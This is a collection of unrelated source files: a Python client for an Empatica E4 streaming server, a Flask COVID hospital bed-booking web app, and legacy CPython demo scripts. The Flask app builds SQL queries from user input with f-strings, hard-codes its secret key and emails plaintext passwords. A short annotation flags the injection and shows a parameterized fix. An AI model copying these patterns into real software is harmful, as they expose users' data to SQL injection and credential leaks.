s.send(msg("%s %s" % (COMMANDS.DEVICE_CONNECT__, DEVICE)))
set_state(STATES.WAITING__)
elif STATE == STATES.CONNECTED_TO_DEVICE__:
# pause streaming initially
print('Initializing...')
s.send(msg("%s ON" % COMMANDS.PAUSE__))
set_state(STATES.WAITING__)
elif STATE == STATES.READY_TO_SUBSCRIBE__:
# subscribe to streams
stream = STREAMS[stream_i]
print('Subscribing to stream: %s' % stream)
s.send(msg("%s %s ON" % (COMMANDS.DEVICE_SUBSCRIBE__, stream)))
set_state(STATES.WAITING__)
elif STATE == STATES.SUBSCRIBE_COMPLETED__:
# begin streaming data
print('Requesting data')
s.send(msg("%s OFF" % COMMANDS.PAUSE__))
set_state(STATES.STREAMING__)
if __name__ == '__main__':
# Create socket connection
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.211.55.3", 28000))
# event loop
while True:
handle_outgoing_msgs()
process_incoming_msgs()
``` |
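
The client above walks a fixed handshake over the Empatica streaming server's TCP line protocol before any samples arrive. A compressed sketch of just that command sequence; the device id is a placeholder, and a real client must read each `R ...` reply before issuing the next command, as the state machine above does:

```python
HANDSHAKE = [
    "device_list",              # discover connected E4s
    "device_connect <id>",      # attach to one device (placeholder id)
    "pause ON",                 # hold streaming while subscribing
    "device_subscribe acc ON",  # repeated for each stream type
    "pause OFF",                # start the data flow
]

def send_handshake(sock):
    """sock is a connected TCP socket to the E4 streaming server.
    A real client reads the 'R ...' reply to each command before the next."""
    for cmd in HANDSHAKE:
        sock.send((cmd + "\r\n").encode())
```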
{
"source": "1by19is169/Covid-Bed-Slot-Booking-System",
"score": 2
} |
#### File: 1by19is169/Covid-Bed-Slot-Booking-System/main.py
```python
from flask import Flask, json,redirect,render_template,flash,request
from flask.globals import request, session
from flask.helpers import url_for
from flask_sqlalchemy import SQLAlchemy
from flask_login import UserMixin
from werkzeug.security import generate_password_hash,check_password_hash
from flask_login import login_required,logout_user,login_user,login_manager,LoginManager,current_user
from flask_mail import Mail
import json
# mydatabase connection
local_server=True
app=Flask(__name__)
app.secret_key="168and169"
with open('config.json','r') as c:
params=json.load(c)["params"]
app.config.update(
MAIL_SERVER='smtp.gmail.com',
MAIL_PORT='465',
MAIL_USE_SSL=True,
MAIL_USERNAME=params['gmail-user'],
MAIL_PASSWORD=params['<PASSWORD>']
)
mail = Mail(app)
# this is for getting the unique user access
login_manager=LoginManager(app)
login_manager.login_view='login'
# app.config['SQLALCHEMY_DATABASE_URI']='mysql://username:password@localhost/databsename'
app.config['SQLALCHEMY_DATABASE_URI']='mysql://root:@localhost/covid'
db=SQLAlchemy(app)
@login_manager.user_loader
def load_user(user_id):
return User.query.get(int(user_id)) or Hospitaluser.query.get(int(user_id))
class Test(db.Model):
id=db.Column(db.Integer,primary_key=True)
name=db.Column(db.String(50))
class User(UserMixin,db.Model):
id=db.Column(db.Integer,primary_key=True)
srfid=db.Column(db.String(20),unique=True)
email=db.Column(db.String(50))
dob=db.Column(db.String(1000))
class Hospitaluser(UserMixin,db.Model):
id=db.Column(db.Integer,primary_key=True)
hcode=db.Column(db.String(20))
email=db.Column(db.String(50))
password=db.Column(db.String(1000))
class Hospitaldata(db.Model):
id=db.Column(db.Integer,primary_key=True)
hcode=db.Column(db.String(20),unique=True)
hname=db.Column(db.String(100))
normalbed=db.Column(db.Integer)
hicubed=db.Column(db.Integer)
icubed=db.Column(db.Integer)
vbed=db.Column(db.Integer)
class Trig(db.Model):
id=db.Column(db.Integer,primary_key=True)
hcode=db.Column(db.String(20))
normalbed=db.Column(db.Integer)
hicubed=db.Column(db.Integer)
icubed=db.Column(db.Integer)
vbed=db.Column(db.Integer)
querys=db.Column(db.String(50))
date=db.Column(db.String(50))
class Bookingpatient(db.Model):
id=db.Column(db.Integer,primary_key=True)
srfid=db.Column(db.String(20),unique=True)
bedtype=db.Column(db.String(100))
hcode=db.Column(db.String(20))
spo2=db.Column(db.Integer)
pname=db.Column(db.String(100))
pphone=db.Column(db.String(100))
paddress=db.Column(db.String(100))
@app.route("/")
def home():
return render_template("index.html")
@app.route("/trigers")
def trigers():
query=Trig.query.all()
return render_template("trigers.html",query=query)
@app.route('/signup',methods=['POST','GET'])
def signup():
if request.method=="POST":
srfid=request.form.get('srf')
email=request.form.get('email')
dob=request.form.get('dob')
# print(srfid,email,dob)
encpassword=generate_password_hash(dob)
user=User.query.filter_by(srfid=srfid).first()
emailUser=User.query.filter_by(email=email).first()
if user or emailUser:
flash("Email or srif is already taken","warning")
return render_template("usersignup.html")
new_user=db.engine.execute(f"INSERT INTO `user` (`srfid`,`email`,`dob`) VALUES ('{srfid}','{email}','{encpassword}') ")
flash("SignUp Success Please Login","success")
return render_template("userlogin.html")
return render_template("usersignup.html")
@app.route('/login',methods=['POST','GET'])
def login():
if request.method=="POST":
srfid=request.form.get('srf')
dob=request.form.get('dob')
user=User.query.filter_by(srfid=srfid).first()
if user and check_password_hash(user.dob,dob):
login_user(user)
flash("Login Success","info")
return render_template("index.html")
else:
flash("Invalid Credentials","danger")
return render_template("userlogin.html")
return render_template("userlogin.html")
@app.route('/hospitallogin',methods=['POST','GET'])
def hospitallogin():
if request.method=="POST":
email=request.form.get('email')
password=request.form.get('password')
user=Hospitaluser.query.filter_by(email=email).first()
if user and check_password_hash(user.password,password):
login_user(user)
flash("Login Success","info")
return render_template("index.html")
else:
flash("Invalid Credentials","danger")
return render_template("hospitallogin.html")
return render_template("hospitallogin.html")
@app.route('/admin',methods=['POST','GET'])
def admin():
if request.method=="POST":
username=request.form.get('username')
password=request.form.get('password')
if(username==params['user'] and password==params['password']):
session['user']=username
flash("login success","info")
return render_template("addHosUser.html")
else:
flash("Invalid Credentials","danger")
return render_template("admin.html")
@app.route('/logout')
@login_required
def logout():
logout_user()
flash("Logout SuccessFul","warning")
return redirect(url_for('login'))
@app.route('/addHospitalUser',methods=['POST','GET'])
def hospitalUser():
if('user' in session and session['user']==params['user']):
if request.method=="POST":
hcode=request.form.get('hcode')
email=request.form.get('email')
password=request.form.get('password')
encpassword=generate_password_hash(password)
hcode=hcode.upper()
emailUser=Hospitaluser.query.filter_by(email=email).first()
if emailUser:
flash("Email or srif is already taken","warning")
db.engine.execute(f"INSERT INTO `hospitaluser` (`hcode`,`email`,`password`) VALUES ('{hcode}','{email}','{encpassword}') ")
# my mail starts from here if you not need to send mail comment the below line
mail.send_message('COVID CARE CENTER',sender=params['gmail-user'],recipients=[email],body=f"Welcome thanks for choosing us\nYour Login Credentials Are:\n Email Address: {email}\nPassword: {password}\n\nHospital Code {hcode}\n\n Do not share your password\n\n\nThank You..." )
flash("Data Sent and Inserted Successfully","warning")
return render_template("addHosUser.html")
else:
flash("Login and try Again","warning")
return render_template("addHosUser.html")
# testing whether db is connected or not
@app.route("/test")
def test():
try:
a=Test.query.all()
print(a)
return f'MY DATABASE IS CONNECTED'
except Exception as e:
print(e)
return f'MY DATABASE IS NOT CONNECTED {e}'
@app.route("/logoutadmin")
def logoutadmin():
session.pop('user')
flash("You are logout admin", "primary")
return redirect('/admin')
@app.route("/addhospitalinfo",methods=['POST','GET'])
def addhospitalinfo():
email=current_user.email
posts=Hospitaluser.query.filter_by(email=email).first()
code=posts.hcode
postsdata=Hospitaldata.query.filter_by(hcode=code).first()
if request.method=="POST":
hcode=request.form.get('hcode')
hname=request.form.get('hname')
nbed=request.form.get('normalbed')
hbed=request.form.get('hicubeds')
ibed=request.form.get('icubeds')
vbed=request.form.get('ventbeds')
hcode=hcode.upper()
huser=Hospitaluser.query.filter_by(hcode=hcode).first()
hduser=Hospitaldata.query.filter_by(hcode=hcode).first()
if hduser:
flash("Data is already Present you can update it..","primary")
return render_template("hospitaldata.html")
if huser:
db.engine.execute(f"INSERT INTO `hospitaldata` (`hcode`,`hname`,`normalbed`,`hicubed`,`icubed`,`vbed`) VALUES ('{hcode}','{hname}','{nbed}','{hbed}','{ibed}','{vbed}')")
flash("Data Is Added","primary")
else:
flash("Hospital Code not Exist","warning")
return render_template("hospitaldata.html",postsdata=postsdata)
@app.route("/hedit/<string:id>",methods=['POST','GET'])
@login_required
def hedit(id):
posts=Hospitaldata.query.filter_by(id=id).first()
if request.method=="POST":
hcode=request.form.get('hcode')
hname=request.form.get('hname')
nbed=request.form.get('normalbed')
hbed=request.form.get('hicubeds')
ibed=request.form.get('icubeds')
vbed=request.form.get('ventbeds')
hcode=hcode.upper()
db.engine.execute(f"UPDATE `hospitaldata` SET `hcode` ='{hcode}',`hname`='{hname}',`normalbed`='{nbed}',`hicubed`='{hbed}',`icubed`='{ibed}',`vbed`='{vbed}' WHERE `hospitaldata`.`id`={id}")
flash("Slot Updated","info")
return redirect("/addhospitalinfo")
# posts=Hospitaldata.query.filter_by(id=id).first()
return render_template("hedit.html",posts=posts)
@app.route("/hdelete/<string:id>",methods=['POST','GET'])
@login_required
def hdelete(id):
db.engine.execute(f"DELETE FROM `hospitaldata` WHERE `hospitaldata`.`id`={id}")
flash("Date Deleted","danger")
return redirect("/addhospitalinfo")
@app.route("/pdetails",methods=['GET'])
@login_required
def pdetails():
code=current_user.srfid
print(code)
data=Bookingpatient.query.filter_by(srfid=code).first()
return render_template("detials.html",data=data)
@app.route("/slotbooking",methods=['POST','GET'])
@login_required
def slotbooking():
query=db.engine.execute(f"SELECT * FROM `hospitaldata` ")
if request.method=="POST":
srfid=request.form.get('srfid')
bedtype=request.form.get('bedtype')
hcode=request.form.get('hcode')
spo2=request.form.get('spo2')
pname=request.form.get('pname')
pphone=request.form.get('pphone')
paddress=request.form.get('paddress')
check2=Hospitaldata.query.filter_by(hcode=hcode).first()
if not check2:
flash("Hospital Code not exist","warning")
code=hcode
dbb=db.engine.execute(f"SELECT * FROM `hospitaldata` WHERE `hospitaldata`.`hcode`='{code}' ")
        seat = 0  # default so 'seat' is defined even when no rows match the code/bed type
if bedtype=="NormalBed":
for d in dbb:
seat=d.normalbed
print(seat)
ar=Hospitaldata.query.filter_by(hcode=code).first()
ar.normalbed=seat-1
db.session.commit()
elif bedtype=="HICUBed":
for d in dbb:
seat=d.hicubed
print(seat)
ar=Hospitaldata.query.filter_by(hcode=code).first()
ar.hicubed=seat-1
db.session.commit()
elif bedtype=="ICUBed":
for d in dbb:
seat=d.icubed
print(seat)
ar=Hospitaldata.query.filter_by(hcode=code).first()
ar.icubed=seat-1
db.session.commit()
elif bedtype=="VENTILATORBed":
for d in dbb:
seat=d.vbed
ar=Hospitaldata.query.filter_by(hcode=code).first()
ar.vbed=seat-1
db.session.commit()
else:
pass
check=Hospitaldata.query.filter_by(hcode=hcode).first()
if(seat>0 and check):
res=Bookingpatient(srfid=srfid,bedtype=bedtype,hcode=hcode,spo2=spo2,pname=pname,pphone=pphone,paddress=paddress)
db.session.add(res)
db.session.commit()
flash("Slot is Booked kindly Visit Hospital for Further Procedure","success")
else:
flash("Something Went Wrong","danger")
return render_template("booking.html",query=query)
app.run(debug=True)
``` |
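
The handlers above interpolate request values straight into SQL f-strings, which is injectable. A sketch of the signup insert rewritten with SQLAlchemy bound parameters, assuming the same `db` object and form values from `signup()`:

```python
from sqlalchemy import text

# parameterized version of the raw insert used in signup()
stmt = text(
    "INSERT INTO `user` (`srfid`, `email`, `dob`) "
    "VALUES (:srfid, :email, :dob)"
)
db.engine.execute(stmt, srfid=srfid, email=email, dob=encpassword)
```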
{
"source": "1byte2bytes/cpython",
"score": 3
} |
#### File: Demo/dns/dnsclass.py
```python
IN = 1 # the Internet
CS = 2 # the CSNET class (Obsolete - used only for examples in
# some obsolete RFCs)
CH = 3 # the CHAOS class
HS = 4 # Hesiod [Dyer 87]
# QCLASS values (section 3.2.5)
ANY = 255 # any class
# Construct reverse mapping dictionary
_names = dir()
classmap = {}
for _name in _names:
if _name[0] != '_': classmap[eval(_name)] = _name
def classstr(klass):
if classmap.has_key(klass): return classmap[klass]
else: return `klass`
```
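
Both DNS demo modules build their reverse maps by `eval()`-ing names returned from `dir()`. A modern Python 3 sketch of the same idiom without `eval`, using an explicit constants dict (illustrative, not a drop-in for the Python 2 demo):

```python
CONSTANTS = {'IN': 1, 'CS': 2, 'CH': 3, 'HS': 4, 'ANY': 255}
classmap = {value: name for name, value in CONSTANTS.items()}

def classstr(klass):
    return classmap.get(klass, repr(klass))

assert classstr(3) == 'CH' and classstr(42) == '42'
```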
#### File: Demo/dns/dnsopcode.py
```python
QUERY = 0
IQUERY = 1
STATUS = 2
# Construct reverse mapping dictionary
_names = dir()
opcodemap = {}
for _name in _names:
if _name[0] != '_': opcodemap[eval(_name)] = _name
def opcodestr(opcode):
if opcodemap.has_key(opcode): return opcodemap[opcode]
else: return `opcode`
```
#### File: Demo/pdist/rcsclient.py
```python
import string
import os
# These defaults don't belong here -- they should be taken from the
# environment or from a hidden file in the current directory
HOST = 'voorn.cwi.nl'
PORT = 4127
VERBOSE = 1
LOCAL = 0
import client
class RCSProxyClient(client.SecureClient):
def __init__(self, address, verbose = client.VERBOSE):
client.SecureClient.__init__(self, address, verbose)
def openrcsclient(opts = []):
"open an RCSProxy client based on a list of options returned by getopt"
import RCSProxy
host = HOST
port = PORT
verbose = VERBOSE
local = LOCAL
directory = None
for o, a in opts:
if o == '-h':
host = a
if ':' in host:
i = string.find(host, ':')
host, p = host[:i], host[i+1:]
if p:
port = string.atoi(p)
if o == '-p':
port = string.atoi(a)
if o == '-d':
directory = a
if o == '-v':
verbose = verbose + 1
if o == '-q':
verbose = 0
if o == '-L':
local = 1
if local:
import RCSProxy
x = RCSProxy.RCSProxyLocal()
else:
address = (host, port)
x = RCSProxyClient(address, verbose)
if not directory:
try:
directory = open(os.path.join("CVS", "Repository")).readline()
except IOError:
pass
else:
if directory[-1] == '\n':
directory = directory[:-1]
if directory:
x.cd(directory)
return x
```
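
`openrcsclient` consumes getopt-style `(flag, value)` pairs. A small sketch of how such a list is produced; the host and port values are placeholders:

```python
import getopt

# equivalent of the command line: rcvs -h localhost:4127 -v
opts, args = getopt.getopt(['-h', 'localhost:4127', '-v'], 'h:p:d:vqL')
assert opts == [('-h', 'localhost:4127'), ('-v', '')]
```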
#### File: Demo/pdist/rcvs.py
```python
from cvslib import CVS, File
import md5
import os
import string
import sys
from cmdfw import CommandFrameWork
DEF_LOCAL = 1 # Default -l
class MyFile(File):
def action(self):
"""Return a code indicating the update status of this file.
The possible return values are:
'=' -- everything's fine
'0' -- file doesn't exist anywhere
'?' -- exists locally only
'A' -- new locally
'R' -- deleted locally
'U' -- changed remotely, no changes locally
(includes new remotely or deleted remotely)
'M' -- changed locally, no changes remotely
'C' -- conflict: changed locally as well as remotely
(includes cases where the file has been added
or removed locally and remotely)
'D' -- deleted remotely
'N' -- new remotely
'r' -- get rid of entry
'c' -- create entry
'u' -- update entry
(and probably others :-)
"""
if not self.lseen:
self.getlocal()
if not self.rseen:
self.getremote()
if not self.eseen:
if not self.lsum:
if not self.rsum: return '0' # Never heard of
else:
return 'N' # New remotely
else: # self.lsum
if not self.rsum: return '?' # Local only
# Local and remote, but no entry
if self.lsum == self.rsum:
return 'c' # Restore entry only
else: return 'C' # Real conflict
else: # self.eseen
if not self.lsum:
if self.edeleted:
if self.rsum: return 'R' # Removed
else: return 'r' # Get rid of entry
else: # not self.edeleted
if self.rsum:
print "warning:",
print self.file,
print "was lost"
return 'U'
else: return 'r' # Get rid of entry
else: # self.lsum
if not self.rsum:
if self.enew: return 'A' # New locally
else: return 'D' # Deleted remotely
else: # self.rsum
if self.enew:
if self.lsum == self.rsum:
return 'u'
else:
return 'C'
if self.lsum == self.esum:
if self.esum == self.rsum:
return '='
else:
return 'U'
elif self.esum == self.rsum:
return 'M'
elif self.lsum == self.rsum:
return 'u'
else:
return 'C'
def update(self):
code = self.action()
if code == '=': return
print code, self.file
if code in ('U', 'N'):
self.get()
elif code == 'C':
print "%s: conflict resolution not yet implemented" % \
self.file
elif code == 'D':
remove(self.file)
self.eseen = 0
elif code == 'r':
self.eseen = 0
elif code in ('c', 'u'):
self.eseen = 1
self.erev = self.rrev
self.enew = 0
self.edeleted = 0
self.esum = self.rsum
self.emtime, self.ectime = os.stat(self.file)[-2:]
self.extra = ''
def commit(self, message = ""):
code = self.action()
if code in ('A', 'M'):
self.put(message)
return 1
elif code == 'R':
print "%s: committing removes not yet implemented" % \
self.file
elif code == 'C':
print "%s: conflict resolution not yet implemented" % \
self.file
def diff(self, opts = []):
self.action() # To update lseen, rseen
flags = ''
rev = self.rrev
# XXX should support two rev options too!
for o, a in opts:
if o == '-r':
rev = a
else:
flags = flags + ' ' + o + a
if rev == self.rrev and self.lsum == self.rsum:
return
flags = flags[1:]
fn = self.file
data = self.proxy.get((fn, rev))
sum = md5.new(data).digest()
if self.lsum == sum:
return
import tempfile
tfn = tempfile.mktemp()
try:
tf = open(tfn, 'w')
tf.write(data)
tf.close()
print 'diff %s -r%s %s' % (flags, rev, fn)
sts = os.system('diff %s %s %s' % (flags, tfn, fn))
if sts:
print '='*70
finally:
remove(tfn)
def commitcheck(self):
return self.action() != 'C'
def put(self, message = ""):
print "Checking in", self.file, "..."
data = open(self.file).read()
if not self.enew:
self.proxy.lock(self.file)
messages = self.proxy.put(self.file, data, message)
if messages:
print messages
self.setentry(self.proxy.head(self.file), self.lsum)
def get(self):
data = self.proxy.get(self.file)
f = open(self.file, 'w')
f.write(data)
f.close()
self.setentry(self.rrev, self.rsum)
def log(self, otherflags):
print self.proxy.log(self.file, otherflags)
def add(self):
self.eseen = 0 # While we're hacking...
self.esum = self.lsum
self.emtime, self.ectime = 0, 0
self.erev = ''
self.enew = 1
self.edeleted = 0
self.eseen = 1 # Done
self.extra = ''
def setentry(self, erev, esum):
self.eseen = 0 # While we're hacking...
self.esum = esum
self.emtime, self.ectime = os.stat(self.file)[-2:]
self.erev = erev
self.enew = 0
self.edeleted = 0
self.eseen = 1 # Done
self.extra = ''
SENDMAIL = "/usr/lib/sendmail -t"
MAILFORM = """To: %s
Subject: CVS changes: %s
...Message from rcvs...
Committed files:
%s
Log message:
%s
"""
class RCVS(CVS):
FileClass = MyFile
def __init__(self):
CVS.__init__(self)
def update(self, files):
for e in self.whichentries(files, 1):
e.update()
def commit(self, files, message = ""):
list = self.whichentries(files)
if not list: return
ok = 1
for e in list:
if not e.commitcheck():
ok = 0
if not ok:
print "correct above errors first"
return
if not message:
message = raw_input("One-liner: ")
committed = []
for e in list:
if e.commit(message):
committed.append(e.file)
self.mailinfo(committed, message)
def mailinfo(self, files, message = ""):
towhom = "<EMAIL>, <EMAIL>" # XXX
mailtext = MAILFORM % (towhom, string.join(files),
string.join(files), message)
print '-'*70
print mailtext
print '-'*70
ok = raw_input("OK to mail to %s? " % towhom)
if string.lower(string.strip(ok)) in ('y', 'ye', 'yes'):
p = os.popen(SENDMAIL, "w")
p.write(mailtext)
sts = p.close()
if sts:
print "Sendmail exit status %s" % str(sts)
else:
print "Mail sent."
else:
print "No mail sent."
def report(self, files):
for e in self.whichentries(files):
e.report()
def diff(self, files, opts):
for e in self.whichentries(files):
e.diff(opts)
def add(self, files):
if not files:
raise RuntimeError, "'cvs add' needs at least one file"
list = []
for e in self.whichentries(files, 1):
e.add()
def rm(self, files):
if not files:
raise RuntimeError, "'cvs rm' needs at least one file"
raise RuntimeError, "'cvs rm' not yet imlemented"
def log(self, files, opts):
flags = ''
for o, a in opts:
flags = flags + ' ' + o + a
for e in self.whichentries(files):
e.log(flags)
def whichentries(self, files, localfilestoo = 0):
if files:
list = []
for file in files:
if self.entries.has_key(file):
e = self.entries[file]
else:
e = self.FileClass(file)
self.entries[file] = e
list.append(e)
else:
list = self.entries.values()
for file in self.proxy.listfiles():
if self.entries.has_key(file):
continue
e = self.FileClass(file)
self.entries[file] = e
list.append(e)
if localfilestoo:
for file in os.listdir(os.curdir):
if not self.entries.has_key(file) \
and not self.ignored(file):
e = self.FileClass(file)
self.entries[file] = e
list.append(e)
list.sort()
if self.proxy:
for e in list:
if e.proxy is None:
e.proxy = self.proxy
return list
class rcvs(CommandFrameWork):
GlobalFlags = 'd:h:p:qvL'
UsageMessage = \
"usage: rcvs [-d directory] [-h host] [-p port] [-q] [-v] [subcommand arg ...]"
PostUsageMessage = \
"If no subcommand is given, the status of all files is listed"
def __init__(self):
"""Constructor."""
CommandFrameWork.__init__(self)
self.proxy = None
self.cvs = RCVS()
def close(self):
if self.proxy:
self.proxy._close()
self.proxy = None
def recurse(self):
self.close()
names = os.listdir(os.curdir)
for name in names:
if name == os.curdir or name == os.pardir:
continue
if name == "CVS":
continue
if not os.path.isdir(name):
continue
if os.path.islink(name):
continue
print "--- entering subdirectory", name, "---"
os.chdir(name)
try:
if os.path.isdir("CVS"):
self.__class__().run()
else:
self.recurse()
finally:
os.chdir(os.pardir)
print "--- left subdirectory", name, "---"
def options(self, opts):
self.opts = opts
def ready(self):
import rcsclient
self.proxy = rcsclient.openrcsclient(self.opts)
self.cvs.setproxy(self.proxy)
self.cvs.getentries()
def default(self):
self.cvs.report([])
def do_report(self, opts, files):
self.cvs.report(files)
def do_update(self, opts, files):
"""update [-l] [-R] [file] ..."""
local = DEF_LOCAL
for o, a in opts:
if o == '-l': local = 1
if o == '-R': local = 0
self.cvs.update(files)
self.cvs.putentries()
if not local and not files:
self.recurse()
flags_update = '-lR'
do_up = do_update
flags_up = flags_update
def do_commit(self, opts, files):
"""commit [-m message] [file] ..."""
message = ""
for o, a in opts:
if o == '-m': message = a
self.cvs.commit(files, message)
self.cvs.putentries()
flags_commit = 'm:'
do_com = do_commit
flags_com = flags_commit
def do_diff(self, opts, files):
"""diff [difflags] [file] ..."""
self.cvs.diff(files, opts)
flags_diff = 'cbitwcefhnlr:sD:S:'
do_dif = do_diff
flags_dif = flags_diff
def do_add(self, opts, files):
"""add file ..."""
if not files:
print "'rcvs add' requires at least one file"
return
self.cvs.add(files)
self.cvs.putentries()
def do_remove(self, opts, files):
"""remove file ..."""
if not files:
print "'rcvs remove' requires at least one file"
return
self.cvs.rm(files)
self.cvs.putentries()
do_rm = do_remove
def do_log(self, opts, files):
"""log [rlog-options] [file] ..."""
self.cvs.log(files, opts)
flags_log = 'bhLNRtd:s:V:r:'
def remove(fn):
try:
os.unlink(fn)
except os.error:
pass
def main():
r = rcvs()
try:
r.run()
finally:
r.close()
if __name__ == "__main__":
main()
```
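The `diff` method in `MyFile` above follows a classic shape: write the repository revision to a temporary file, shell out to `diff`, and always clean up. A minimal modern-Python sketch of the same pattern (the helper name and standalone form are illustrative, not part of rcvs):
```python
import os
import subprocess
import tempfile

def diff_against_data(local_path, remote_data, flags=()):
    """Write remote_data to a temp file, run diff against the working file,
    and always remove the temp file -- the shape of MyFile.diff() above."""
    fd, tmp = tempfile.mkstemp()
    try:
        with os.fdopen(fd, 'w') as f:
            f.write(remote_data)
        # A non-zero exit status means the files differ, as checked above.
        return subprocess.run(['diff', *flags, tmp, local_path]).returncode
    finally:
        os.unlink(tmp)
```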
#### File: Demo/scripts/mkrcs.py
```python
import os
def main():
rcstree = 'RCStree'
rcs = 'RCS'
if os.path.islink(rcs):
print `rcs`, 'is a symlink to', `os.readlink(rcs)`
return
if os.path.isdir(rcs):
print `rcs`, 'is an ordinary directory'
return
if os.path.exists(rcs):
print `rcs`, 'is a file?!?!'
return
#
p = os.getcwd()
up = ''
down = ''
# Invariants:
# (1) join(p, down) is the current directory
# (2) up is the same directory as p
# Ergo:
# (3) join(up, down) is the current directory
#print 'p =', `p`
while not os.path.isdir(os.path.join(p, rcstree)):
head, tail = os.path.split(p)
#print 'head =', `head`, '; tail =', `tail`
if not tail:
print 'Sorry, no ancestor dir contains', `rcstree`
return
p = head
up = os.path.join(os.pardir, up)
down = os.path.join(tail, down)
#print 'p =', `p`, '; up =', `up`, '; down =', `down`
there = os.path.join(up, rcstree)
there = os.path.join(there, down)
there = os.path.join(there, rcs)
if os.path.isdir(there):
print `there`, 'already exists'
else:
print 'making', `there`
makedirs(there)
print 'making symlink', `rcs`, '->', `there`
os.symlink(there, rcs)
def makedirs(p):
if not os.path.isdir(p):
head, tail = os.path.split(p)
makedirs(head)
os.mkdir(p, 0777)
main()
```
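The invariant comments are the core of mkrcs.py: `p` climbs toward the root while `up` and `down` accumulate the relative paths in each direction. A self-contained sketch of just that walk (the function name is illustrative):
```python
import os

def find_ancestor_containing(name, start=os.curdir):
    """Climb toward the root maintaining the mkrcs.py invariants:
    join(p, down) is always the starting directory and up names the
    same directory as p, so join(up, down) is the starting directory."""
    p = os.path.abspath(start)
    up = down = ''
    while not os.path.isdir(os.path.join(p, name)):
        head, tail = os.path.split(p)
        if not tail:
            return None                  # hit the filesystem root
        p = head
        up = os.path.join(os.pardir, up)
        down = os.path.join(tail, down)
    return p, up, down
```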
#### File: Demo/scripts/script.py
```python
import os, time, sys
import pty
def read(fd):
data = os.read(fd, 1024)
file.write(data)
return data
shell = 'sh'
filename = 'typescript'
mode = 'w'
if os.environ.has_key('SHELL'):
shell = os.environ['SHELL']
if '-a' in sys.argv:
mode = 'a'
if '-p' in sys.argv:
shell = 'python'
file = open(filename, mode)
sys.stdout.write('Script started, file is %s\n' % filename)
file.write('Script started on %s\n' % time.ctime(time.time()))
pty.spawn(shell, read)
file.write('Script done on %s\n' % time.ctime(time.time()))
sys.stdout.write('Script done, file is %s\n' % filename)
```
#### File: sgi/al/playold.py
```python
import al, sys, time
import AL
BUFSIZE = 8000
def main():
if len(sys.argv) < 2:
f = sys.stdin
filename = sys.argv[0]
else:
if len(sys.argv) <> 2:
sys.stderr.write('usage: ' + \
sys.argv[0] + ' filename\n')
sys.exit(2)
filename = sys.argv[1]
f = open(filename, 'r')
#
magic = f.read(4)
extra = ''
if magic == '0008':
rate = 8000
elif magic == '0016':
rate = 16000
elif magic == '0032':
rate = 32000
else:
sys.stderr.write('no magic header; assuming 8k samples/sec.\n')
rate = 8000
extra = magic
#
pv = [AL.OUTPUT_RATE, rate]
al.setparams(AL.DEFAULT_DEVICE, pv)
c = al.newconfig()
c.setchannels(AL.MONO)
c.setwidth(AL.SAMPLE_8)
port = al.openport(filename, 'w', c)
if extra:
port.writesamps(extra)
while 1:
buf = f.read(BUFSIZE)
if not buf: break
port.writesamps(buf)
while port.getfilled() > 0:
time.sleep(0.1)
try:
main()
except KeyboardInterrupt:
sys.exit(1)
```
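The magic-header scheme above maps a 4-byte ASCII prefix to a sample rate and treats anything else as headerless 8 kHz data whose first four bytes are real samples. A small sketch of that decision (rates taken from the code above; the function is illustrative):
```python
RATES = {b'0008': 8000, b'0016': 16000, b'0032': 32000}

def parse_magic(header4):
    """First four bytes of the file select the sample rate; with no magic,
    assume 8 kHz and keep the bytes -- they are audio data, not a header."""
    rate = RATES.get(header4)
    if rate is None:
        return 8000, header4
    return rate, b''

assert parse_magic(b'0016') == (16000, b'')
assert parse_magic(b'\x00\x01\x02\x03') == (8000, b'\x00\x01\x02\x03')
```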
#### File: sgi/al/record.py
```python
import al, sys
import AL
BUFSIZE = 2000
QSIZE = 4000
def main():
c = al.newconfig()
c.setchannels(AL.MONO)
c.setqueuesize(QSIZE)
p = al.openport('', 'r', c)
while 1:
data = p.readsamps(BUFSIZE)
sys.stdout.write(data)
try:
main()
except KeyboardInterrupt:
sys.exit(1)
```
#### File: sgi/cd/cdaiff.py
```python
import sys
import readcd
import aifc
import AL
import cd
Error = 'cdaiff.Error'
def writeaudio(a, type, data):
a.writeframesraw(data)
def main():
if len(sys.argv) > 1:
a = aifc.open(sys.argv[1], 'w')
else:
a = aifc.open('@', 'w')
a.setsampwidth(AL.SAMPLE_16)
a.setnchannels(AL.STEREO)
a.setframerate(AL.RATE_44100)
r = readcd.Readcd()
for arg in sys.argv[2:]:
x = eval(arg)
try:
if len(x) <> 2:
raise Error, 'bad argument'
r.appendstretch(x[0], x[1])
except TypeError:
r.appendtrack(x)
r.setcallback(cd.audio, writeaudio, a)
r.play()
a.close()
main()
```
#### File: sgi/cd/listcd.py
```python
import cd
def main():
c = cd.open()
info = []
while 1:
try:
info.append(c.gettrackinfo(len(info) + 1))
except RuntimeError:
break
for i in range(len(info)):
start, total = info[i]
print 'Track', zfill(i+1), triple(start), triple(total)
def triple((a, b, c)):
return zfill(a) + ':' + zfill(b) + ':' + zfill(c)
def zfill(n):
s = `n`
return '0' * (2 - len(s)) + s
main()
```
#### File: sgi/gl/glinfo.py
```python
import gl
import GL
def main():
names = []
maxlen = 0
for name in dir(GL):
if name[:3] == 'GD_':
names.append(name)
maxlen = max(maxlen, len(name))
for name in names:
print name + (maxlen - len(name))*' ' + '=',
print gl.getgdesc(getattr(GL, name))
main()
```
#### File: gl/glstdwin/tcolor.py
```python
import stdwingl
import stdwin
from stdwinevents import *
NROWS = 16
NCOLS = 16
def main():
stdwin.setdefwinsize(NCOLS * stdwin.textwidth('12345'), \
NROWS * stdwin.lineheight() * 3)
w = stdwin.open('TestColors')
#
while 1:
type, window, detail = stdwin.getevent()
if type == WE_CLOSE:
print 'Bye.'
break
elif type == WE_SIZE:
w.change((0,0), (10000, 10000))
elif type == WE_DRAW:
width, height = w.getwinsize()
d = w.begindrawing()
for row in range(NROWS):
for col in range(NCOLS):
color = row*NCOLS + col
d.setfgcolor(color)
p = col*width/NCOLS, row*height/NROWS
q = (col+1)*width/NCOLS, \
(row+1)*height/NROWS
d.paint((p, q))
d.setfgcolor(0)
d.box((p, q))
d.text(p, `color`)
p = p[0], p[1] + d.lineheight()
d.setfgcolor(7)
d.text(p, `color`)
del d
#
main()
```
#### File: sgi/sv/burstcapt.py
```python
import sys
import sv, SV
import gl, GL, DEVICE
def main():
format = SV.RGB8_FRAMES
requestedwidth = SV.PAL_XMAX
queuesize = 30
if sys.argv[1:]:
queuesize = eval(sys.argv[1])
v = sv.OpenVideo()
svci = (format, requestedwidth, 0, queuesize, 0)
